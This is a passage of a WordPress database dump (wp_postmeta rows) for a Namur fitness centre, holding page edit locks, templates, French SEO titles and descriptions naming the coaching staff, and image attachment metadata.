(1309, 354, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1310, 354, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1311, 354, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1312, 354, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1346, 360, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1345, 360, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1342, 359, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1343, 360, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1344, 360, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585577:1\";}\";'),
(1319, 356, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1320, 356, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1381355870:2\";}\";'),
(1321, 356, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1322, 356, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1323, 356, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1324, 356, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1341, 359, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1338, 359, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585577:1\";}\";'),
(1339, 359, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1340, 359, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1337, 359, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1577, 397, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1578, 397, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1579, 398, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1580, 398, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464789:1\";}\";'),
(1581, 398, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1582, 398, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1583, 400, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1584, 400, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384467565:2\";}\";'),
(1585, 400, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1586, 400, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1587, 401, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1588, 401, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282095:1\";}\";'),
(1589, 401, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1590, 401, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1591, 402, '_wp_attached_file', '2013/05/julie_rogge_pti.jpg'),
(1592, 402, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:254;s:4:\"file\";s:27:\"2013/05/julie_rogge_pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"julie_rogge_pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:27:\"julie_rogge_pti-198x224.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:4.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"DMC-TZ30\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1385042766;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"11\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";}}'),
(1593, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1594, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282406:1\";}\";'),
(1595, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1596, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1597, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1598, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1599, 403, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1600, 403, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282421:1\";}\";'),
(1601, 403, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1602, 403, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1603, 403, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1604, 403, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1605, 404, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1606, 404, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282470:1\";}\";'),
(1607, 404, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1608, 404, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1609, 404, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1610, 404, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1611, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1612, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390070977:1\";}\";'),
(1613, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1614, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1615, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1616, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071037:1\";}\";'),
(1617, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1618, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1619, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1620, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071112:1\";}\";'),
(1621, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1622, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1623, 407, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1624, 407, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071143:1\";}\";'),
(1625, 407, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1626, 407, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1627, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1628, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071322:1\";}\";'),
(1629, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1630, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1631, 408, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1632, 408, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071336:1\";}\";'),
(1633, 408, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1634, 408, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1635, 409, '_wp_attached_file', '2013/11/zumba3.jpg'),
(1636, 409, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:70;s:6:\"height\";i:24;s:4:\"file\";s:18:\"2013/11/zumba3.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(1637, 410, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1638, 410, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071559:1\";}\";'),
(1639, 410, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1640, 410, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1641, 411, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1642, 411, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071609:1\";}\";'),
(1643, 411, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1644, 411, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1645, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1646, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071667:1\";}\";'),
(1647, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1648, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1649, 412, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1650, 412, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071697:1\";}\";'),
(1651, 412, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1652, 412, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1653, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1654, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071757:1\";}\";'),
(1655, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1656, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1657, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1658, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071817:1\";}\";'),
(1659, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1660, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1661, 413, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1662, 413, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071847:1\";}\";'),
(1663, 413, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1664, 413, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1665, 414, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1666, 414, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071910:1\";}\";'),
(1667, 414, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1668, 414, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1669, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1670, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071970:1\";}\";'),
(1671, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1672, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1673, 415, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1674, 415, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072030:1\";}\";'),
(1675, 415, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1676, 415, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1677, 416, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1678, 416, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072053:1\";}\";'),
(1679, 416, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1680, 416, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1681, 417, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1682, 417, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072088:1\";}\";'),
(1683, 417, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1684, 417, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1685, 418, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1686, 418, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072133:1\";}\";'),
(1687, 418, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1688, 418, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1689, 419, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1690, 419, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072299:1\";}\";'),
(1691, 419, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1692, 419, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1693, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1694, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250108:1\";}\";'),
(1695, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1696, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1697, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1698, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1699, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1700, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250160:1\";}\";'),
(1701, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1702, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1703, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1704, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1705, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1706, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250222:1\";}\";'),
(1707, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1708, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1709, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1710, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1711, 420, '_wp_attached_file', '2013/05/youssra_boujat_pti.jpg'),
(1712, 420, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:258;s:4:\"file\";s:30:\"2013/05/youssra_boujat_pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"youssra_boujat_pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:30:\"youssra_boujat_pti-198x224.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(1713, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1714, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250283:1\";}\";'),
(1715, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1716, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1717, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1718, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1719, 421, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1720, 421, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250296:1\";}\";'),
(1721, 421, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1722, 421, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1723, 421, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1724, 421, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1725, 422, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1726, 422, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250362:1\";}\";'),
(1727, 422, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1728, 422, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1729, 422, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1730, 422, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1731, 423, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1732, 423, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250403:1\";}\";'),
(1733, 423, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1734, 423, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1735, 423, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1736, 423, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1737, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1738, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977485:1\";}\";'),
(1739, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1740, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1741, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1742, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1743, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1744, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977545:1\";}\";'),
(1745, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1746, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1747, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1748, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1749, 425, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1750, 425, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977560:1\";}\";'),
(1751, 425, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1752, 425, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1753, 425, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1754, 425, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1755, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1756, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977761:1\";}\";'),
(1757, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1758, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1759, 426, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1760, 426, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977776:1\";}\";'),
(1761, 426, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1762, 426, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1763, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1764, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977840:1\";}\";'),
(1765, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1766, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1767, 427, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1768, 427, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977854:1\";}\";'),
(1769, 427, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1770, 427, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1771, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1772, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977914:1\";}\";'),
(1773, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1774, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1775, 428, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1776, 428, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977973:1\";}\";'),
(1777, 428, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1778, 428, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1779, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1780, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978122:1\";}\";'),
(1781, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1782, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1783, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1784, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978167:1\";}\";'),
(1785, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1786, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1787, 429, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1788, 429, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978182:1\";}\";'),
(1789, 429, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1790, 429, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1791, 430, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1792, 430, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978219:1\";}\";'),
(1793, 430, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1794, 430, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1795, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1796, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978279:1\";}\";'),
(1797, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1798, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1799, 431, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1800, 431, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978339:1\";}\";'),
(1801, 431, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1802, 431, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1803, 432, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1804, 432, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978396:1\";}\";'),
(1805, 432, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1806, 432, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1807, 433, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1808, 433, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978458:1\";}\";'),
(1809, 433, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1810, 433, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1811, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1812, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1392659829:1\";}\";'),
(1813, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1814, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
